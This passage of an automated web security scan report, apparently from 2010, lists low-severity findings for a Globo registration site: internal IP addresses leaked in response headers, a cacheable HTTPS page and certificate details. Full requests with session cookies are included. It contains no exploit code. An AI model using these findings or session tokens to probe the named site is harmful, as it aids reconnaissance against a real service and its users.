Date: Fri, 31 Dec 2010 14:57:00 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.6
Content-Type: image/jpeg
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 2086

......JFIF.............C......
........'.....0"$.'92<;8276?GZL?CUD67NkOU]`efe=KownbvZcea...C...........aA7Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa......-...."..............................
...[SNIP]...

5.3. https://cadastrofree.globo.com/Servlet/word.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /Servlet/word.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Servlet/word.jpg;jsessionid=04FE2772C9708E2FFB7223167596160D HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Referer: https://cadastrofree.globo.com/cadastro/1745
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:30 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.7
Content-Type: image/jpeg
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 2022

......JFIF.............C......
........'.....0"$.'92<;8276?GZL?CUD67NkOU]`efe=KownbvZcea...C...........aA7Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa......-...."..............................
...[SNIP]...

5.4. https://cadastrofree.globo.com/cadastro/1745  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /cadastro/1745

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /cadastro/1745 HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:56:55 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.6
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

5.5. https://cadastrofree.globo.com/cadastro/1745  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /cadastro/1745

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /cadastro/1745 HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:26 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-control: max-age=0
Server-IP: 10.10.180.7
Set-Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 11534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

5.6. https://cadastrofree.globo.com/contrato/1745  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /contrato/1745

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /contrato/1745 HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 14:59:00 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server-IP: 10.10.180.6
Pragma: no-cache
Cache-control: max-age=0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

5.7. https://cadastrofree.globo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:36 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server-IP: 10.10.180.7
ETag: W/"1150-1218221938000"
Last-Modified: Fri, 08 Aug 2008 18:58:58 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ..........................f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f
...[SNIP]...

5.8. https://cadastrofree.globo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:55:09 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server-IP: 10.10.180.6
ETag: W/"1150-1218221938000"
Last-Modified: Fri, 08 Aug 2008 18:58:58 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ..........................f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f
...[SNIP]...

5.9. https://cadastrofree.globo.com/login/1745  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /login/1745

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /login/1745 HTTP/1.1
Host: cadastrofree.globo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=04FE2772C9708E2FFB7223167596160D; RMAM=01TFSM_12.4fE9CbFG|; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; OAX=rnneEk0d7PgABd6P; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829;

Response

HTTP/1.0 200 OK
Date: Fri, 31 Dec 2010 15:05:19 GMT
X-Powered-By: -
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server-IP: 10.10.180.6
Pragma: no-cache
Cache-control: max-age=0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html dir="ltr" xml:lang="pt-br" lang="pt-br" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

6. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /resources/barra/glb_barra_2008_google_export_1024.html

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /resources/barra/glb_barra_2008_google_export_1024.html HTTP/1.1
Host: cadastrofree.globo.com
Connection: keep-alive
Referer: https://cadastrofree.globo.com/cadastro/1745
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEk0d7PgABd6P; __utmz=100629313.1293806829.1.1.utmcsr=globo.com|utmccn=(referral)|utmcmd=referral|utmcct=/ssi/barra/parceiros.htm; __utma=100629313.936291352.1293806829.1293806829.1293806829.1; __utmc=100629313; __utmb=100629313.1.10.1293806829; RMAM=01TFSM_12.4fE9CbFG|; JSESSIONID=04FE2772C9708E2FFB7223167596160D

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 14:49:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a
Last-Modified: Mon, 20 Dec 2010 07:43:14 GMT
Accept-Ranges: bytes
Cache-Control: max-age=600
Expires: Fri, 31 Dec 2010 14:59:30 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3619

<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">


<style>body {margin:0;padding:0;}</style>
<link rel="stylesheet" media="
...[SNIP]...

7. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cadastrofree.globo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  cadastrofree.globo.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Aug 18 19:00:00 CDT 2010
Valid to:  Fri Aug 19 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Fri Dec 31 09:57:54 CST 2010.